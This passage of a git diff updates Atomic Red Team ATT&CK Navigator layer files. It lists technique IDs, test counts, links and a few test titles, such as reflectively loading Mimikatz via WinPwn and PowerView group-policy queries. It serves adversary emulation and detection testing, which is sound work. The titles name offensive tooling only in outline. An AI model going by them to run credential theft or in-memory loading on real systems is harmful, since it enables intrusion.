Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 73e9ecac00..646c375897 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View 